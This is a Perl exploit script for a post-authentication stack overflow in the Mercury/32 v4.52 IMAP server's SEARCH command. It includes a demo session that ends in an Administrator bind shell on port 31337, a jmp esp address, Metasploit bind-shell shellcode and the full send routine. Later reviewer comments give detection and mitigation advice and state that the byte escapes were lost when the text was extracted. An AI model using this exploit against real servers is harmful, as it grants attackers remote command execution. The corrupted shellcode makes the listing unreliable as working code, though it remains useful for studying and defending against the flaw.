# Z:Exp>mercury_SEARCH.pl 127.0.0.1 143 void ph4nt0m.org
# Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit
# Found & Code by void# ph4nt0m.org
#
# S: * OK mercury.ph4nt0m.org IMAP4rev1 Mercury/32 v4.52 server ready.
# C: pst06 LOGIN void ph4nt0m.org
# S: pst06 OK LOGIN completed.
# C: pst06 SELECT INBOX
# S: * 0 EXISTS
# S: * 0 RECENT
# S: * FLAGS (Deleted Draft Seen Answered)
# S: * OK [UIDVALIDITY 1190225819] UID Validity
# S: * OK [UIDNEXT 1] Predicted next UID
# S: * OK [PERMANENTFLAGS (Deleted Draft Seen Answered)] Settable message flag
# s
# S: pst06 OK [READ-WRITE] SELECT completed.
# [*] Send Evil Payload ...
# [+] Done! Check out cmdshell@127.0.0.1:31337. Good Luck :-P
#
# Z:Exp>nc -vv 127.0.0.1 31337
# DNS fwd/rev mismatch: localhost != GNU
# localhost [127.0.0.1] 31337 (?) open
# Microsoft Windows XP [Version 5.1.2600]        (CHS banner; appeared as mojibake in the original listing)
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:MERCURY>whoami
# whoami
# Administrator
#
# e:MERCURY>
#
# Reviewer notes (defensive reading of this listing):
#  - What it shows: after a successful LOGIN and SELECT, the client sends a
#    SEARCH whose argument is a long filler string, a 4-byte address and a
#    payload that (per the comments) opens a listener on TCP 31337. Valid
#    mailbox credentials are therefore a precondition - this is post-auth.
#  - Detection: a SEARCH argument of several hundred bytes immediately after
#    LOGIN/SELECT, and a new listening socket on the mail host, are the
#    observable artifacts of this sequence.
#  - Mitigation: keep Mercury/32 at a release where this is fixed (if one is
#    available), do not expose IMAP to untrusted networks, and do not run the
#    service with Administrator rights - the transcript above shows the
#    resulting shell inherits Administrator.
#  - The listing as extracted has lost the backslash of every "\x" escape, so
#    the string literals below are plain ASCII text, not the byte values the
#    original script sent.

use strict;
use warnings;
use IO::Socket;

# Target IP
# NOTE(review): a bare 127.0.0.1 in Perl source is a v-string
# (chr(127).chr(0).chr(0).chr(1)), not the text "127.0.0.1"; it only works
# here when the host is given on the command line. Left unchanged.
my $imap_host = shift || 127.0.0.1;
my $imap_port = shift || 143;
my $imap_user = shift || "void";
my $imap_pass = shift || "ph4nt0m.org";

my $banner = " Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit ". " Found & Code by void#ph4nt0m.org ". " ";

# Filler that precedes the return address in the SEARCH argument.
my $cheers = "Celebrate_the_6th_anniversary_of_the_founding_of_Ph4nt0m.org";

# Return address (backslashes lost in extraction, see notes above).
my $jmpesp = "x12x45xfax7f"; # Windows 2000/xp/2003 CHS Universe

# /* win32_bind - EXITFUNC=thread LPORT=31337 Size=347 Encoder=Pex http://metasploit.com */
# bad char: 0x00 0x0A 0x0D 0x20 0x29
# Payload body (backslashes lost in extraction, see notes above).
my $shellcode =
"x31xc9x81xe9xb0xffxffxffxe8xffxffxffxffxc0x5ex81".
"x76x0exfaxd1xa5x6fx83xeexfcxe2xf4x06xbbx4ex22x12".
"x28x5ax90x05xb1x2ex03xdexf5x2ex2axc6x5axd9x6ax82".
"xd0x4axe4xb5xc9x2ex30xdaxd0x4ex26x71xe5x2ex6ex14".
"xe0x65xf6x56x55x65x1bxfdx10x6fx62xfbx13x4ex9bxc1".
"x85x81x47x8fx34x2ex30xdexd0x4ex09x71xddxeexe4xa5".
"xcdxa4x84xf9xfdx2exe6x96xf5xb9x0ex39xe0x7ex0bx71".
"x92x95xe4xbaxddx2ex1fxe6x7cx2ex2fxf2x8fxcdxe1xb4".
"xdfx49x3fx05x07xc3x3cx9cxb9x96x5dx92xa6xd6x5dxa5".
"x85x5axbfx92x1ax48x93xc1x81x5axb9xa5x58x40x09x7b".
"x3cxadx6dxafxbbxa7x90x2axb9x7cx66x0fx7cxf2x90x2c".
"x82xf6x3cxa9x82xe6x3cxb9x82x5axbfx9cxb9xdfx06x9c".
"x82x2cx8ex6fxb9x01x75x8ax16xf2x90x2cxbbxb5x3exaf".
"x2ex75x07x5ex7cx8bx86xadx2ex73x3cxafx2ex75x07x1f".
"x98x23x26xadx2ex73x3fxaex85xf0x90x2ax42xcdx88x83".
"x17xdcx38x05x07xf0x90x2axb7xcfx0bx9cxb9xc6x02x73".
"x34xcfx3fxa3xf8x69xe6x1dxbbxe1xe6x18xe0x65x9cx50".
"x2fxe7x42x04x93x89xfcx77xabx9dxc4x51x7axcdx1dx04".
"x62xb3x90x8fx95x5axb9xa1x86xf7x3exabx80xcfx6exab".
"x80xf0x3ex05x01xcdxc2x23xd4x6bx3cx05x07xcfx90x05".
"xe6x5axbfx71x86x59xecx3exb5x5axb9xa8x2ex75x07x15".
"x1fx45x0fxa9x2ex73x90x2axd1xa5x6f";

print $banner;
sleep(1);

# Plain TCP connection; the die message carries no $!, so a refused or
# timed-out connect gives no diagnostic beyond the fixed text.
my $sock = IO::Socket::INET->new( PeerHost=>$imap_host, PeerPort=>$imap_port, proto=>"tcp" ) or die "Connect error. ";

# Consume the server greeting (empty tag: stops at the first line matching "OK").
imap_recv("");

# Authenticate and select the mailbox; "rv" = echo the command and wait for
# the tagged reply. The credentials travel in clear text over this socket.
imap_send("pst06 LOGIN $imap_user $imap_pass ", "rv");
imap_send("pst06 SELECT INBOX ", "rv");

# filler . return address . payload, sent as the SEARCH argument.
my $payload = $cheers.$jmpesp.$shellcode;
print "[*] Send Evil Payload ... ";

# Sent with no flags: nothing is echoed and no reply is awaited.
imap_send("pst06 SEARCH ON $payload ", "");
sleep(1);
print "[+] Done! Check out cmdshell@$imap_host:31337. Good Luck :-P ";
$sock->close();

# imap_send($line, $flags)
#   $line  - the raw command line to write to $sock (the caller supplies any
#            line terminator inside the string).
#   $flags - a string of option letters:
#            'v' echoes the line prefixed "C: "; lines longer than 75 chars
#                are shown as the first 36 chars, " ... ", and the last 36
#                chars minus the final one (substr($_[0], -36, -1)).
#            'r' then calls imap_recv with the tag, taken as everything up to
#                and including the first space of $line.
#   Returns whatever the last statement yields; callers ignore the value.
#   Writes to $sock are unchecked (no error handling on print).
sub imap_send { if($_[1] =~ /v/) { if(length($_[0])<=75) { print "C: ".$_[0]; } else { print "C: ".substr($_[0], 0, 36)." ... ".substr($_[0], -36, -1)." "; } } print $sock $_[0]; if($_[1] =~ /r/) { imap_recv(substr($_[0], 0, index($_[0], " ")+1)); } }

# imap_recv($tag)
#   Reads lines from $sock, echoing each prefixed "S: ", until a line matches
#   "<tag>OK" or "<tag>NO" / "<tag>BAD" (regex match, $tag interpolated
#   unescaped - fine for the fixed "pst06 " tags used here). With an empty
#   $tag the loop ends at the first line containing "OK". If the peer closes
#   the connection the loop simply ends when <$sock> returns undef; no error
#   is reported.
sub imap_recv { while(<$sock>) { print "S: ".$_; if($_ =~ /$_[0]OK/) { last; } elsif($_ =~ /$_[0]NO|$_[0]BAD/ ) { last; } else { next; } } }

# sebug.net